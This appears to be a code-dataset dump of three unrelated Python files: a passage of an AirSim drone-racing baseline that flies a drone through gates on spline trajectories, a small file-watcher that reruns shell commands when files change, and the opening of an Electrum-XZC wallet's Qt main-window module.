self.gate_poses_ground_truth = None
self.viz_image_cv2 = viz_image_cv2
self.viz_traj = viz_traj
self.viz_traj_color_rgba = viz_traj_color_rgba
self.airsim_client = airsim.MultirotorClient()
self.airsim_client.confirmConnection()
# we need two airsim MultirotorClient objects because the comm lib we use (rpclib) is not thread safe
# so we poll images in a thread using one airsim MultirotorClient object
# and use another airsim MultirotorClient for querying state commands
self.airsim_client_images = airsim.MultirotorClient()
self.airsim_client_images.confirmConnection()
self.airsim_client_odom = airsim.MultirotorClient()
self.airsim_client_odom.confirmConnection()
self.level_name = None
self.image_callback_thread = threading.Thread(
target=self.repeat_timer_image_callback, args=(self.image_callback, 0.03)
)
self.odometry_callback_thread = threading.Thread(
target=self.repeat_timer_odometry_callback,
args=(self.odometry_callback, 0.02),
)
self.is_image_thread_active = False
self.is_odometry_thread_active = False
self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS = (
10 # see https://github.com/microsoft/AirSim-Drone-Racing-Lab/issues/38
)
# loads desired level
def load_level(self, level_name, sleep_sec=2.0):
self.level_name = level_name
self.airsim_client.simLoadLevel(self.level_name)
self.airsim_client.confirmConnection() # failsafe
time.sleep(sleep_sec) # let the environment load completely
# Starts an instance of a race in your given level, if valid
def start_race(self, tier=3):
self.airsim_client.simStartRace(tier)
# Resets a current race: moves players to start positions, timer and penalties reset
def reset_race(self):
self.airsim_client.simResetRace()
# arms drone, enable APIs, set default traj tracker gains
def initialize_drone(self):
self.airsim_client.enableApiControl(vehicle_name=self.drone_name)
self.airsim_client.arm(vehicle_name=self.drone_name)
# set default values for trajectory tracker gains
traj_tracker_gains = airsim.TrajectoryTrackerGains(
kp_cross_track=5.0,
kd_cross_track=0.0,
kp_vel_cross_track=3.0,
kd_vel_cross_track=0.0,
kp_along_track=0.4,
kd_along_track=0.0,
kp_vel_along_track=0.04,
kd_vel_along_track=0.0,
kp_z_track=2.0,
kd_z_track=0.0,
kp_vel_z=0.4,
kd_vel_z=0.0,
kp_yaw=3.0,
kd_yaw=0.1,
)
self.airsim_client.setTrajectoryTrackerGains(
traj_tracker_gains, vehicle_name=self.drone_name
)
time.sleep(0.2)
def takeoffAsync(self):
self.airsim_client.takeoffAsync().join()
# like takeoffAsync(), but with moveOnSpline()
def takeoff_with_moveOnSpline(self, takeoff_height=1.0):
start_position = self.airsim_client.simGetVehiclePose(
vehicle_name=self.drone_name
).position
takeoff_waypoint = airsim.Vector3r(
start_position.x_val,
start_position.y_val,
start_position.z_val - takeoff_height,
)
self.airsim_client.moveOnSplineAsync(
[takeoff_waypoint],
vel_max=15.0,
acc_max=5.0,
add_position_constraint=True,
add_velocity_constraint=False,
add_acceleration_constraint=False,
viz_traj=self.viz_traj,
viz_traj_color_rgba=self.viz_traj_color_rgba,
vehicle_name=self.drone_name,
).join()
# stores gate ground truth poses as a list of airsim.Pose() objects in self.gate_poses_ground_truth
def get_ground_truth_gate_poses(self):
gate_names_sorted_bad = sorted(self.airsim_client.simListSceneObjects("Gate.*"))
# gate_names_sorted_bad is of the form `GateN_GARBAGE`. for example:
# ['Gate0', 'Gate10_21', 'Gate11_23', 'Gate1_3', 'Gate2_5', 'Gate3_7', 'Gate4_9', 'Gate5_11', 'Gate6_13', 'Gate7_15', 'Gate8_17', 'Gate9_19']
# we sort them by their ibdex of occurence along the race track(N), and ignore the unreal garbage number after the underscore(GARBAGE)
gate_indices_bad = [
int(gate_name.split("_")[0][4:]) for gate_name in gate_names_sorted_bad
]
gate_indices_correct = sorted(
range(len(gate_indices_bad)), key=lambda k: gate_indices_bad[k]
)
gate_names_sorted = [
gate_names_sorted_bad[gate_idx] for gate_idx in gate_indices_correct
]
self.gate_poses_ground_truth = []
for gate_name in gate_names_sorted:
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
counter = 0
while (
math.isnan(curr_pose.position.x_val)
or math.isnan(curr_pose.position.y_val)
or math.isnan(curr_pose.position.z_val)
) and (counter < self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS):
print(f"DEBUG: {gate_name} position is nan, retrying...")
counter += 1
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
assert not math.isnan(
curr_pose.position.x_val
), f"ERROR: {gate_name} curr_pose.position.x_val is still {curr_pose.position.x_val} after {counter} trials"
assert not math.isnan(
curr_pose.position.y_val
), f"ERROR: {gate_name} curr_pose.position.y_val is still {curr_pose.position.y_val} after {counter} trials"
assert not math.isnan(
curr_pose.position.z_val
), f"ERROR: {gate_name} curr_pose.position.z_val is still {curr_pose.position.z_val} after {counter} trials"
self.gate_poses_ground_truth.append(curr_pose)
# this is utility function to get a velocity constraint which can be passed to moveOnSplineVelConstraints()
# the "scale" parameter scales the gate facing vector accordingly, thereby dictating the speed of the velocity constraint
def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale=1.0):
import numpy as np
# convert gate quaternion to rotation matrix.
# ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html
q = np.array(
[
airsim_quat.w_val,
airsim_quat.x_val,
airsim_quat.y_val,
airsim_quat.z_val,
],
dtype=np.float64,
)
n = np.dot(q, q)
if n < np.finfo(float).eps:
return airsim.Vector3r(0.0, 1.0, 0.0)
q *= np.sqrt(2.0 / n)
q = np.outer(q, q)
rotation_matrix = np.array(
[
[1.0 - q[2, 2] - q[3, 3], q[1, 2] - q[3, 0], q[1, 3] + q[2, 0]],
[q[1, 2] + q[3, 0], 1.0 - q[1, 1] - q[3, 3], q[2, 3] - q[1, 0]],
[q[1, 3] - q[2, 0], q[2, 3] + q[1, 0], 1.0 - q[1, 1] - q[2, 2]],
]
)
gate_facing_vector = rotation_matrix[:, 1]
return airsim.Vector3r(
scale * gate_facing_vector[0],
scale * gate_facing_vector[1],
scale * gate_facing_vector[2],
)
def fly_through_all_gates_one_by_one_with_moveOnSpline(self):
if self.level_name == "Building99_Hard":
vel_max = 5.0
acc_max = 2.0
if self.level_name in [
"Soccer_Field_Medium",
"Soccer_Field_Easy",
"ZhangJiaJie_Medium",
]:
vel_max = 10.0
acc_max = 5.0
return self.airsim_client.moveOnSplineAsync(
[gate_pose.position],
vel_max=vel_max,
acc_max=acc_max,
add_position_constraint=True,
add_velocity_constraint=False,
add_acceleration_constraint=False,
viz_traj=self.viz_traj,
viz_traj_color_rgba=self.viz_traj_color_rgba,
vehicle_name=self.drone_name,
)
def fly_through_all_gates_at_once_with_moveOnSpline(self):
if self.level_name in [
"Soccer_Field_Medium",
"Soccer_Field_Easy",
"ZhangJiaJie_Medium",
"Qualifier_Tier_1",
"Qualifier_Tier_2",
"Qualifier_Tier_3",
"Final_Tier_1",
"Final_Tier_2",
"Final_Tier_3",
]:
vel_max = 30.0
acc_max = 15.0
if self.level_name == "Building99_Hard":
vel_max = 4.0
acc_max = 1.0
return self.airsim_client.moveOnSplineAsync(
[gate_pose.position for gate_pose in self.gate_poses_ground_truth],
vel_max=vel_max,
acc_max=acc_max,
add_position_constraint=True,
add_velocity_constraint=False,
add_acceleration_constraint=False,
viz_traj=self.viz_traj,
viz_traj_color_rgba=self.viz_traj_color_rgba,
vehicle_name=self.drone_name,
)
def fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints(self):
add_velocity_constraint = True
add_acceleration_constraint = False
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy"]:
vel_max = 15.0
acc_max = 3.0
speed_through_gate = 2.5
if self.level_name == "ZhangJiaJie_Medium":
vel_max = 10.0
acc_max = 3.0
speed_through_gate = 1.0
if self.level_name == "Building99_Hard":
vel_max = 2.0
acc_max = 0.5
speed_through_gate = 0.5
add_velocity_constraint = False
# scale param scales the gate facing vector by desired speed.
return self.airsim_client.moveOnSplineVelConstraintsAsync(
[gate_pose.position],
[
self.get_gate_facing_vector_from_quaternion(
gate_pose.orientation, scale=speed_through_gate
)
],
vel_max=vel_max,
acc_max=acc_max,
add_position_constraint=True,
add_velocity_constraint=add_velocity_constraint,
add_acceleration_constraint=add_acceleration_constraint,
viz_traj=self.viz_traj,
viz_traj_color_rgba=self.viz_traj_color_rgba,
vehicle_name=self.drone_name,
)
def fly_through_all_gates_at_once_with_moveOnSplineVelConstraints(self):
if self.level_name in [
"Soccer_Field_Easy",
"Soccer_Field_Medium",
"ZhangJiaJie_Medium",
]:
vel_max = 15.0
acc_max = 7.5
speed_through_gate = 2.5
if self.level_name == "Building99_Hard":
vel_max = 5.0
acc_max = 2.0
speed_through_gate = 1.0
return self.airsim_client.moveOnSplineVelConstraintsAsync(
[gate_pose.position for gate_pose in self.gate_poses_ground_truth],
[
self.get_gate_facing_vector_from_quaternion(
gate_pose.orientation, scale=speed_through_gate
)
for gate_pose in self.gate_poses_ground_truth
],
vel_max=vel_max,
acc_max=acc_max,
add_position_constraint=True,
add_velocity_constraint=True,
add_acceleration_constraint=False,
viz_traj=self.viz_traj,
viz_traj_color_rgba=self.viz_traj_color_rgba,
vehicle_name=self.drone_name,
)
def image_callback(self):
# get uncompressed fpv cam image
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
response = self.airsim_client_images.simGetImages(request)
img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
def odometry_callback(self):
# get uncompressed fpv cam image
drone_state = self.airsim_client_odom.getMultirotorState()
# in world frame:
position = drone_state.kinematics_estimated.position
orientation = drone_state.kinematics_estimated.orientation
linear_velocity = drone_state.kinematics_estimated.linear_velocity
angular_velocity = drone_state.kinematics_estimated.angular_velocity
# call task() method every "period" seconds.
def repeat_timer_image_callback(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def repeat_timer_odometry_callback(self, task, period):
while self.is_odometry_thread_active:
task()
time.sleep(period)
def start_image_callback_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started image callback thread")
def stop_image_callback_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def start_odometry_callback_thread(self):
if not self.is_odometry_thread_active:
self.is_odometry_thread_active = True
self.odometry_callback_thread.start()
print("Started odometry callback thread")
def stop_odometry_callback_thread(self):
if self.is_odometry_thread_active:
self.is_odometry_thread_active = False
self.odometry_callback_thread.join()
print("Stopped odometry callback thread.")
def main(args):
# ensure you have generated the neurips planning settings file by running python generate_settings_file.py
baseline_racer = BaselineRacer(
drone_name="drone_1",
viz_traj=args.viz_traj,
viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0],
viz_image_cv2=args.viz_image_cv2,
)
baseline_racer.load_level(args.level_name)
if args.level_name == "Qualifier_Tier_1":
args.race_tier = 1
if args.level_name == "Qualifier_Tier_2":
args.race_tier = 2
if args.level_name == "Qualifier_Tier_3":
args.race_tier = 3
baseline_racer.start_race(args.race_tier)
baseline_racer.initialize_drone()
baseline_racer.takeoff_with_moveOnSpline()
baseline_racer.get_ground_truth_gate_poses()
baseline_racer.start_image_callback_thread()
baseline_racer.start_odometry_callback_thread()
if args.planning_baseline_type == "all_gates_at_once":
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSplineVelConstraints().join()
if args.planning_baseline_type == "all_gates_one_by_one":
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints().join()
# Comment out the following if you observe the python script exiting prematurely, and resetting the race
baseline_racer.stop_image_callback_thread()
baseline_racer.stop_odometry_callback_thread()
baseline_racer.reset_race()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument(
"--level_name",
type=str,
choices=[
"Soccer_Field_Easy",
"Soccer_Field_Medium",
"ZhangJiaJie_Medium",
"Building99_Hard",
"Qualifier_Tier_1",
"Qualifier_Tier_2",
"Qualifier_Tier_3",
"Final_Tier_1",
"Final_Tier_2",
"Final_Tier_3",
],
default="ZhangJiaJie_Medium",
)
parser.add_argument(
"--planning_baseline_type",
type=str,
choices=["all_gates_at_once", "all_gates_one_by_one"],
default="all_gates_at_once",
)
parser.add_argument(
"--planning_and_control_api",
type=str,
choices=["moveOnSpline", "moveOnSplineVelConstraints"],
default="moveOnSpline",
)
parser.add_argument(
"--enable_viz_traj", dest="viz_traj", action="store_true", default=False
)
parser.add_argument(
"--enable_viz_image_cv2",
dest="viz_image_cv2",
action="store_true",
default=False,
)
parser.add_argument("--race_tier", type=int, choices=[1, 2, 3], default=1)
args = parser.parse_args()
main(args)
|
watcher.py | from __future__ import print_function
import datetime
import os
import threading
import time
class Watcher(object):
def __init__(self, files=None, cmds=None, verbose=False, clear=False):
self.files = []
self.cmds = []
self.num_runs = 0
self.mtimes = {}
self._monitor_continously = False
self._monitor_thread = None
self.verbose = verbose
self.clear = clear
if files: self.add_files(*files)
if cmds: self.add_cmds(*cmds)
def monitor(self):
#We only want one thread, dear god
self.stop_monitor()
self._monitor_continously = True
self._monitor_thread = threading.Thread(target=self._monitor_till_stopped)
self._monitor_thread.start()
def run_monitor(self):
"""Called by main thread methods like __main__ so Ctrl-C works"""
self.monitor()
try:
while self._monitor_continously:
time.sleep(.02)
except KeyboardInterrupt:
self.stop_monitor()
def stop_monitor(self):
if self._monitor_thread and self._monitor_thread.isAlive():
self._monitor_continously = False
self._monitor_thread.join(0.05)
def _monitor_till_stopped(self):
while self._monitor_continously:
self.monitor_once()
time.sleep(1)
def monitor_once(self, execute=True):
for f in self.files:
try:
mtime = os.stat(f).st_mtime
except OSError:
#The file might be right in the middle of being written so sleep
time.sleep(1)
mtime = os.stat(f).st_mtime
if f not in self.mtimes.keys():
self.mtimes[f] = mtime
continue
if mtime > self.mtimes[f]:
if self.verbose: print("File changed: %s" % os.path.realpath(f))
self.mtimes[f] = mtime
if execute:
self.execute()
break
def execute(self):
if self.verbose: print("Running commands at %s" % (datetime.datetime.now(), ))
if self.clear:
os.system('clear')
[ os.system(cmd) for cmd in self.cmds ]
self.num_runs += 1
return self.num_runs
def walk_dirs(self, dirnames):
dir_files = []
for dirname in dirnames:
for path, dirs, files in os.walk(dirname):
files = [ os.path.join(path, f) for f in files ]
dir_files.extend(files)
dir_files.extend(self.walk_dirs(dirs))
return dir_files
def add_files(self, *files):
dirs = [ os.path.realpath(f) for f in files if os.path.isdir(f) ]
files = [ os.path.realpath(f) for f in files if os.path.isfile(f) ]
dir_files = self.walk_dirs(dirs)
files.extend(dir_files)
valid_files = [ os.path.realpath(f) for f in files if os.path.exists(f) and os.path.isfile(f) ]
unique_files = [ f for f in valid_files if f not in self.files ]
self.files = self.files + unique_files
self.monitor_once(execute=False)
def add_cmds(self, *cmds):
unique_cmds = [ c for c in cmds if c not in self.cmds ]
self.cmds = self.cmds + unique_cmds
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_xzc
from electrum_xzc import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_xzc.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_xzc.plugin import run_hook
from electrum_xzc.i18n import _
from electrum_xzc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_xzc.transaction import Transaction, TxOutput
from electrum_xzc.address_synchronizer import AddTransactionException
from electrum_xzc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_xzc.version import ELECTRUM_VERSION
from electrum_xzc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_xzc.exchange_rate import FxThread
from electrum_xzc.simple_config import SimpleConfig
from electrum_xzc.logging import Logger
from electrum_xzc.paymentrequest import PR_PAID
from electrum_xzc.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .masternode_dialog import MasternodeDialog
from .dash_qt import ExtraPayloadWidget
from .protx_qt import create_dip3_tab
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.masternode_manager = None
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.dip3_tab = create_dip3_tab(self, wallet)
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-xzc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# dash net callbacks
self.network.dash_net.register_callback(self.on_dash_net,
['dash-net-updated',
'dash-peers-updated'])
self.update_dash_net_status_btn()
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates', False) is None:
choice = self.question(title="Electrum-XZC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum-XZC.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_dash_net(self, event, *args):
self.gui_object.dash_net_sobj.main.emit(event, args)
def on_dash_net_qt(self, event, args=None):
self.update_dash_net_status_btn()
def update_dash_net_status_btn(self):
net = self.network
icon = (net.dash_net.status_icon() if net else 'dash_net_off.png')
self.dash_net_button.setIcon(read_QIcon(icon))
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.dip3_tab.w_model.reload_data()
self.dip3_tab.update_wallet_label()
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
